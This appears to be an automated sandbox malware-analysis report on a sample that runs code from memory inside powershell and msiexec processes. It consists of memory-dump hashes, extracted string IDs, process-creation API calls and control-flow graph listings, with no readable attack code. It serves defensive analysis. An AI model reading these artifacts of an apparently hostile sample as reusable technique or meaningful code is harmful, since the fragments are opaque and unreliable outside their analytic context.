                                                                                                    • Opcode ID: 76d5a9c443c461e807107468d28bb046727b29374e965a5113f168cf70c2e603
                                                                                                    • Instruction ID: d7dc97392820f2a9a926a3a42aaeb21ecb11cb569923c4d9c8c6f02b551d2960
                                                                                                    • Opcode Fuzzy Hash: 76d5a9c443c461e807107468d28bb046727b29374e965a5113f168cf70c2e603
                                                                                                    • Instruction Fuzzy Hash: 3951B3F0A0224ADFDB24CE04C64C7B677B2BF4531AF18A466E8059B290D775DDC1CBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$$jq$$jq$$jq$jl$jl
                                                                                                    • API String ID: 0-2060193051
                                                                                                    • Opcode ID: 5d05f941ff2e147c0999cfec36d3fecb4cfbb2b9c7ef1b1bde1a05d1de31aaed
                                                                                                    • Instruction ID: a3fc44782b7da71c95c87183a7b04dbf406d05950f0445f0d1e944550eac6d5a
                                                                                                    • Opcode Fuzzy Hash: 5d05f941ff2e147c0999cfec36d3fecb4cfbb2b9c7ef1b1bde1a05d1de31aaed
                                                                                                    • Instruction Fuzzy Hash: 2A516DB1706316AFCB255E7AC8183A7BFB6EFC2214F14807BD445CB251DA32C995C7A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$84rl$d%pq$d%pq$d%pq$tPjq$$jq
                                                                                                    • API String ID: 0-1234104484
                                                                                                    • Opcode ID: 7efa864d5237b2ef14c5c979379a67c718fcf1a977cd20f7f1c25b805284559d
                                                                                                    • Instruction ID: c080186f5b84828ba9f22127c42bb213cac96eb4fc21cfc9df522948d9242a77
                                                                                                    • Opcode Fuzzy Hash: 7efa864d5237b2ef14c5c979379a67c718fcf1a977cd20f7f1c25b805284559d
                                                                                                    • Instruction Fuzzy Hash: C451F5F1A12216DFDB24CE14C548BBAB7E2EF84758F189099E811AF390C735DD81CBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$4'jq$4'jq$x.ek$-ek
                                                                                                    • API String ID: 0-3254272252
                                                                                                    • Opcode ID: a734ef96f9cbd3740f35e127aa7228fdf901aa32e5fd6c90d7cb8955b7f36805
                                                                                                    • Instruction ID: 1f17c3786b16add107c8985cd5f396b25bb81f3fbb13d847de93a15cb7fbae9a
                                                                                                    • Opcode Fuzzy Hash: a734ef96f9cbd3740f35e127aa7228fdf901aa32e5fd6c90d7cb8955b7f36805
                                                                                                    • Instruction Fuzzy Hash: 881239B0A402199FDB24DF14CD90BEABBB2FB45304F1085E4D9096B795CB72AE85CF91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                                                                                    • API String ID: 0-3356825164
                                                                                                    • Opcode ID: bf2e9c111d97e924495cab53aca2f8ed97f1c49adf2d63eca2122786af225498
                                                                                                    • Instruction ID: 7ce798b914902ac561794ac07da69abc0b8231009325f9c616b8eba54c089337
                                                                                                    • Opcode Fuzzy Hash: bf2e9c111d97e924495cab53aca2f8ed97f1c49adf2d63eca2122786af225498
                                                                                                    • Instruction Fuzzy Hash: EC3157B27463038FDB254A6594981B6B7B6EFC2116B24D47FE8C28B281DE35C8C6C351
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$84rl$d%pq$d%pq$d%pq$tPjq
                                                                                                    • API String ID: 0-890069297
                                                                                                    • Opcode ID: 4eb2938de0b0edc15e33b487cc7e5d3263a9286e7625d4866daec7d1525e0a55
                                                                                                    • Instruction ID: 177c4e499dea4e0c8caf4363bfbeb87ab4b47b0a1202b98ce672cef12d20e9fe
                                                                                                    • Opcode Fuzzy Hash: 4eb2938de0b0edc15e33b487cc7e5d3263a9286e7625d4866daec7d1525e0a55
                                                                                                    • Instruction Fuzzy Hash: 5331A2B1B01215DFCB28DF54C948EAABBE2FF88714F259199E905AB350C731DD41CBA0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84rl$84rl$tPjq$tPjq$$jq
                                                                                                    • API String ID: 0-1502646468
                                                                                                    • Opcode ID: 1217215e5f61215cd9bc0cdc4a219c8513d5391af60f97ea223b5f5f7d912ba9
                                                                                                    • Instruction ID: 66f8d58c0e980c2fc4daa5f1a0b8756e47bea299fc0369fe3eec56de4aebbafc
                                                                                                    • Opcode Fuzzy Hash: 1217215e5f61215cd9bc0cdc4a219c8513d5391af60f97ea223b5f5f7d912ba9
                                                                                                    • Instruction Fuzzy Hash: C0615AB1701205CFCB259B69C548AAABBF3EF85314F68C469E8159F395CB31DC81CBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                                                                    • API String ID: 0-103809679
                                                                                                    • Opcode ID: 23b2478cfa1a293477aad12e4fed85f8e163d82ec1359caf70dc1d2a18d77c1f
                                                                                                    • Instruction ID: 647513455f48b73e3fe092c83ec7a7dd5dc5ed0bb0d21d20a5b2e84d67bd66bf
                                                                                                    • Opcode Fuzzy Hash: 23b2478cfa1a293477aad12e4fed85f8e163d82ec1359caf70dc1d2a18d77c1f
                                                                                                    • Instruction Fuzzy Hash: 3F415BF1706206EFCF354A2489182BE7BA3EFC1311F14546AD8018B695DF36C981C7A2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                                                                    • API String ID: 0-103809679
                                                                                                    • Opcode ID: 614d484ad05eeea69f9b029cc7f670445958efc0cd05f6a9989c4245c1acdd22
                                                                                                    • Instruction ID: ff0ee717d86fbacdc2c19a4b15ffedb702e3ede93d71d2bfb993b75013efa3b5
                                                                                                    • Opcode Fuzzy Hash: 614d484ad05eeea69f9b029cc7f670445958efc0cd05f6a9989c4245c1acdd22
                                                                                                    • Instruction Fuzzy Hash: 2D4160B1702207DFCB254E698C485B6B7AEFFC2214B28947BDD918B191CB39C891C761
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$4'jq$4'jq
                                                                                                    • API String ID: 0-4000621977
                                                                                                    • Opcode ID: 063f78ae3ec83a543696a471ef4f6b9fe7c2e8b67e129704608b491ff144e042
                                                                                                    • Instruction ID: b8d6410f1d6850b8c01efa3da03e945592f58de89a5ac3dd7ef8308dc7807df8
                                                                                                    • Opcode Fuzzy Hash: 063f78ae3ec83a543696a471ef4f6b9fe7c2e8b67e129704608b491ff144e042
                                                                                                    • Instruction Fuzzy Hash: 9CD149B1F0624ADFCB158F68C8186AABBA2BF85315F14D07BD805CB2A1DB31CD85C791
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$(ftl$(ftl$(ftl
                                                                                                    • API String ID: 0-2794839566
                                                                                                    • Opcode ID: 1fe534959971281a2ed2a0d3b94daec9816ee4a86eba6a3b28e627a65bad9eb9
                                                                                                    • Instruction ID: 8976017f65a2714e8deb82537670853b95fc381ae31e638c7ca594d971129dca
                                                                                                    • Opcode Fuzzy Hash: 1fe534959971281a2ed2a0d3b94daec9816ee4a86eba6a3b28e627a65bad9eb9
                                                                                                    • Instruction Fuzzy Hash: F5C17DF0E01205DFCB14CF58C555AAABBB2EF88328F14D569D815AB755CB32EC82CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$(ftl$(ftl$(ftl
                                                                                                    • API String ID: 0-2794839566
                                                                                                    • Opcode ID: 6ed565c23176ae4291ff23c2355fc2f0ad5eb6cd8849323ea3d33071a3642a46
                                                                                                    • Instruction ID: 7b8bfd00930ff2b2a3686558cbac567cd9e01c7aa369e5f14176827402881b50
                                                                                                    • Opcode Fuzzy Hash: 6ed565c23176ae4291ff23c2355fc2f0ad5eb6cd8849323ea3d33071a3642a46
                                                                                                    • Instruction Fuzzy Hash: 0C718CB0B01205DFDB14CF68C955EAABBB2EF89314F15D069D805AB315CB32ED91CB92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ,Stl$,Stl$p5dk$xStl
                                                                                                    • API String ID: 0-1515001056
                                                                                                    • Opcode ID: 031c037d38b62096e514781bdc057190c46fd4099d86146cda428403bfd14fd5
                                                                                                    • Instruction ID: 25b0987573a85471a720a11155afc48ee6a2c26e19feabf835709a509e67cd33
                                                                                                    • Opcode Fuzzy Hash: 031c037d38b62096e514781bdc057190c46fd4099d86146cda428403bfd14fd5
                                                                                                    • Instruction Fuzzy Hash: CF4168B1B05205AFCB209B3885157ABBFE6DFC5314F14C47AD508DB751DA31D980CBA2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $jq$$jq$$jq$$jq
                                                                                                    • API String ID: 0-2428501249
                                                                                                    • Opcode ID: 5134042fb37ef90f9d42dd39ac291ab2386a7a5c2e8b5573847365e64a2ea407
                                                                                                    • Instruction ID: e1b2197f2b48ed12bdc53eb9c78e29b11e5c955ac1f3a9430264eb80802c634c
                                                                                                    • Opcode Fuzzy Hash: 5134042fb37ef90f9d42dd39ac291ab2386a7a5c2e8b5573847365e64a2ea407
                                                                                                    • Instruction Fuzzy Hash: 1E2177B13012025BDB24492A9C0876B76EADFD2714F60842AF905CB281DE3ACC80C371

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:6.6%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:25
                                                                                                    Total number of Limit Nodes:3
                                                                                                    execution_graph 15974 3274ab8 15975 3274ac4 15974->15975 15978 3279de0 15975->15978 15976 3274aec 15979 3279e0c 15978->15979 15980 3279e2a 15979->15980 15984 327a2a0 15979->15984 15989 327a35d 15979->15989 15994 327a2b0 15979->15994 15980->15976 15985 327a2db 15984->15985 15987 327a5ca 15985->15987 15999 3279fb0 15985->15999 15987->15980 15990 327a364 15989->15990 15991 3279fb0 CreateProcessW 15990->15991 15992 327a5ca 15990->15992 15993 327a3ca 15991->15993 15992->15980 15995 327a2db 15994->15995 15996 3279fb0 CreateProcessW 15995->15996 15998 327a5ca 15995->15998 15997 327a3ca 15996->15997 15998->15980 16001 327a960 CreateProcessW 15999->16001 16002 327ab63 16001->16002 16003 327ac88 16004 327acd4 WaitForInputIdle 16003->16004 16006 327ad1a 16004->16006

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 569 3279fb0-327a9d4 572 327a9d6-327a9dc 569->572 573 327a9df-327a9e6 569->573 572->573 574 327a9f1-327a9f8 573->574 575 327a9e8-327a9ee 573->575 576 327aa17-327aa1b 574->576 577 327a9fa-327aa16 574->577 575->574 578 327aa1d-327aa33 576->578 579 327aa3b-327aa4b 576->579 577->576 578->579 580 327aa4d-327aa69 579->580 581 327aa6a-327aa6e 579->581 580->581 582 327aa70-327aa87 581->582 583 327aa8f-327aaa8 581->583 582->583 584 327aab6-327aabf 583->584 585 327aaaa-327aab3 583->585 586 327aac1-327aad8 584->586 587 327aada-327aade 584->587 585->584 586->587 588 327aae0-327aaf1 587->588 589 327aaf9-327ab0d 587->589 588->589 590 327ab12-327ab61 CreateProcessW 589->590 591 327ab0f 589->591 592 327ab63-327ab69 590->592 593 327ab6a-327ab9b 590->593 591->590 592->593 596 327abb0-327abb4 593->596 597 327ab9d-327aba1 593->597 598 327abb6-327abba 596->598 599 327abc9-327abcd 596->599 597->596 600 327aba3-327aba6 597->600 598->599 601 327abbc-327abbf 598->601 602 327abe2-327abe6 599->602 603 327abcf-327abd3 599->603 600->596 601->599 605 327abf7 602->605 606 327abe8-327abf4 602->606 603->602 604 327abd5-327abd8 603->604 604->602 608 327abf8 605->608 606->605 608->608
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 0327AB51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3281464249.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_3270000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: 916114c56ea6a8ef415a555daa22d9ca3ea010c8780e63ef24b67facc9978cdc
                                                                                                    • Instruction ID: 85c8719d72f09ae0413f23ddb3ed4b152189220e692f8993143ac7f89f870136
                                                                                                    • Opcode Fuzzy Hash: 916114c56ea6a8ef415a555daa22d9ca3ea010c8780e63ef24b67facc9978cdc
                                                                                                    • Instruction Fuzzy Hash: C591E371E10249DBDB15CFA9C88479EFBB2BF88310F29812AE415A7350DB74A985CF91

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 609 327a955-327a9d4 611 327a9d6-327a9dc 609->611 612 327a9df-327a9e6 609->612 611->612 613 327a9f1-327a9f8 612->613 614 327a9e8-327a9ee 612->614 615 327aa17-327aa1b 613->615 616 327a9fa-327aa16 613->616 614->613 617 327aa1d-327aa33 615->617 618 327aa3b-327aa4b 615->618 616->615 617->618 619 327aa4d-327aa69 618->619 620 327aa6a-327aa6e 618->620 619->620 621 327aa70-327aa87 620->621 622 327aa8f-327aaa8 620->622 621->622 623 327aab6-327aabf 622->623 624 327aaaa-327aab3 622->624 625 327aac1-327aad8 623->625 626 327aada-327aade 623->626 624->623 625->626 627 327aae0-327aaf1 626->627 628 327aaf9-327ab0d 626->628 627->628 629 327ab12-327ab61 CreateProcessW 628->629 630 327ab0f 628->630 631 327ab63-327ab69 629->631 632 327ab6a-327ab9b 629->632 630->629 631->632 635 327abb0-327abb4 632->635 636 327ab9d-327aba1 632->636 637 327abb6-327abba 635->637 638 327abc9-327abcd 635->638 636->635 639 327aba3-327aba6 636->639 637->638 640 327abbc-327abbf 637->640 641 327abe2-327abe6 638->641 642 327abcf-327abd3 638->642 639->635 640->638 644 327abf7 641->644 645 327abe8-327abf4 641->645 642->641 643 327abd5-327abd8 642->643 643->641 647 327abf8 644->647 645->644 647->647
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 0327AB51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3281464249.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_3270000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: 22e4c2b63327d0d09065ce9208f4790e12a3169a30a09e695363a4aada72436a
                                                                                                    • Instruction ID: 100f4c0ec23a02e91478a1e63f579f428392300f802d125fe44cfffef7a0fcbd
                                                                                                    • Opcode Fuzzy Hash: 22e4c2b63327d0d09065ce9208f4790e12a3169a30a09e695363a4aada72436a
                                                                                                    • Instruction Fuzzy Hash: 3D91E4B1D10249DFDB15CFA9C88479DFBB2BF88314F29812AE414A7350D774A985CF91

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 770 327b068-327b088 771 327b08f-327b120 770->771 772 327b08a 770->772 776 327b126-327b136 771->776 777 327b474-327b4a6 771->777 772->771 827 327b139 call 327bae6 776->827 828 327b139 call 327b7a0 776->828 829 327b139 call 327b790 776->829 781 327b13f-327b14e 782 327b156-327b172 781->782 784 327b174 782->784 785 327b179-327b182 782->785 784->785 786 327b467-327b46d 785->786 787 327b187-327b201 786->787 788 327b473 786->788 793 327b207-327b275 call 3279978 787->793 794 327b2bd-327b318 787->794 788->777 804 327b277-327b2b7 793->804 805 327b2b8-327b2bb 793->805 806 327b319-327b369 794->806 804->805 805->806 811 327b452-327b45d 806->811 812 327b36f-327b451 806->812 814 327b464 811->814 815 327b45f 811->815 812->811 814->786 815->814 827->781 828->781 829->781
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3281464249.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_3270000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 534c2e2fc54caf148be64f074c99cda5f6b940e16b47292da5ba53963c373fe9
                                                                                                    • Instruction ID: 8c7a88bc16ad61ee61ec81ce8081e3e56f8614ed84c6a2e2f189fef3897257fa
                                                                                                    • Opcode Fuzzy Hash: 534c2e2fc54caf148be64f074c99cda5f6b940e16b47292da5ba53963c373fe9
                                                                                                    • Instruction Fuzzy Hash: FCC1A0B4E01218CFDB14DFA5C994B9DBBB2FF89300F1080A9E809AB355DB755A85CF51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3281464249.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_3270000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7041135552eace39a345a7aecdee6daa35cf1f36d7b6086f7e49ee243257be50
                                                                                                    • Instruction ID: 48baf28881febe40799cf1d97a8671ce6cefa8d612aa8b7fbe1ca1aa30bef891
                                                                                                    • Opcode Fuzzy Hash: 7041135552eace39a345a7aecdee6daa35cf1f36d7b6086f7e49ee243257be50
                                                                                                    • Instruction Fuzzy Hash: 9AA10474D11208CFDB14DFA9C988BDDBBB1FF89310F248269E409AB291DBB49985CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3281464249.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_3270000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 26fbf3a449023fbdd491b735ab861c8cad11276cd8c8129f130548abefa061f1
                                                                                                    • Instruction ID: 7815988d586c78d278afc0ec8699a31545d279a2ceaabaff025e8f17c68beb3d
                                                                                                    • Opcode Fuzzy Hash: 26fbf3a449023fbdd491b735ab861c8cad11276cd8c8129f130548abefa061f1
                                                                                                    • Instruction Fuzzy Hash: 44A11474D11208CFDB14DFA9C988BDDBBB1FF89310F248269E409AB291DB749984CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3281464249.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_3270000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5f74c465fbb0974d1da5f903b821776f8e745fe2f8eef567595cf1914c2ca96b
                                                                                                    • Instruction ID: e7e8bb407ba0830f30a94fae3bb184f93987a52abe033020115e1a07e22a5c38
                                                                                                    • Opcode Fuzzy Hash: 5f74c465fbb0974d1da5f903b821776f8e745fe2f8eef567595cf1914c2ca96b
                                                                                                    • Instruction Fuzzy Hash: 00910274D11218CFDB10DFA8C988BDDBBB1FF49311F2492A9E409AB295DBB49984CF14

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 648 327ac7c-327acdc 650 327ace4-327ad18 WaitForInputIdle 648->650 651 327ad21-327ad5b 650->651 652 327ad1a-327ad20 650->652 656 327ad65 651->656 657 327ad5d 651->657 652->651 658 327ad66 656->658 657->656 658->658
                                                                                                    APIs
                                                                                                    • WaitForInputIdle.USER32(00000000), ref: 0327AD08
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3281464249.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_3270000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IdleInputWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 2200289081-0
                                                                                                    • Opcode ID: 918532956929c0ea0f6c49623a6d007042df11f8f23a5831429a849efe1898c9
                                                                                                    • Instruction ID: bd8c634e0029f90e2e8b786384fb0eb9695baf62d41f306f5d7fa23e0cb09dd0
                                                                                                    • Opcode Fuzzy Hash: 918532956929c0ea0f6c49623a6d007042df11f8f23a5831429a849efe1898c9
                                                                                                    • Instruction Fuzzy Hash: 502104B0D102189FCB14CFA9D595A9EBBF4AF08310F24802AE819A7350CB749945CFA1

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 659 327ac88-327ad18 WaitForInputIdle 662 327ad21-327ad5b 659->662 663 327ad1a-327ad20 659->663 667 327ad65 662->667 668 327ad5d 662->668 663->662 669 327ad66 667->669 668->667 669->669
                                                                                                    APIs
                                                                                                    • WaitForInputIdle.USER32(00000000), ref: 0327AD08
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3281464249.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_3270000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IdleInputWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 2200289081-0
                                                                                                    • Opcode ID: d7644a78236e26df6ffcc0909f6632be48f265370fe2ac455a8bc5ec3dce6e23
                                                                                                    • Instruction ID: a03968aa9b81182cb663a1e2fd39d5974b58f4cf70f9843f05d98e40c30c8bef
                                                                                                    • Opcode Fuzzy Hash: d7644a78236e26df6ffcc0909f6632be48f265370fe2ac455a8bc5ec3dce6e23
                                                                                                    • Instruction Fuzzy Hash: AB21C3B0D102589FCB14CFAAD585A9EFFF5AF49710F24805AE819B7354CB74A944CFA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3281259548.000000000324D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0324D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_324d000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4f519c078a804a0a430d18f62a3ef429edb4c4053c83142413c93a2016784fb3
                                                                                                    • Instruction ID: 45b0c9e0b21e0378450e4826c439443294d559cdaabdef95f824f510854d410e
                                                                                                    • Opcode Fuzzy Hash: 4f519c078a804a0a430d18f62a3ef429edb4c4053c83142413c93a2016784fb3
                                                                                                    • Instruction Fuzzy Hash: F021F271624204DFCB19DF24D980B26BBA5EB84314F24C5ADD9494B257C37AD486CA62
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3281259548.000000000324D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0324D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_324d000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 03232167ac8f7e319cb50f154c189f98083e7f90aa4986befa8cdd387345a912
                                                                                                    • Instruction ID: 9b12f9814a0fa245b58203dd623994b9032685ae06c4e423faa6f9f8b7d2bd8e
                                                                                                    • Opcode Fuzzy Hash: 03232167ac8f7e319cb50f154c189f98083e7f90aa4986befa8cdd387345a912
                                                                                                    • Instruction Fuzzy Hash: 4211B875504280CFCB1ACF24D9C4B15FBA1FB88314F28C6AAD8494B656C33AD48ACB62
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3281464249.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_3270000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: f75fd2b824468a6c3af115acb81b97646e82ea772ad62aec6fcdb27a45a6bdbe
                                                                                                    • Instruction ID: 373b16df7fd10503bdd61f470d4796e7bf1ee3bf048321672775d6597609d66b
                                                                                                    • Opcode Fuzzy Hash: f75fd2b824468a6c3af115acb81b97646e82ea772ad62aec6fcdb27a45a6bdbe
                                                                                                    • Instruction Fuzzy Hash: D702F474E04219DFDB14CFA9C984B9DBBB2BF49300F1580A9E819AB365DB34AD85CF50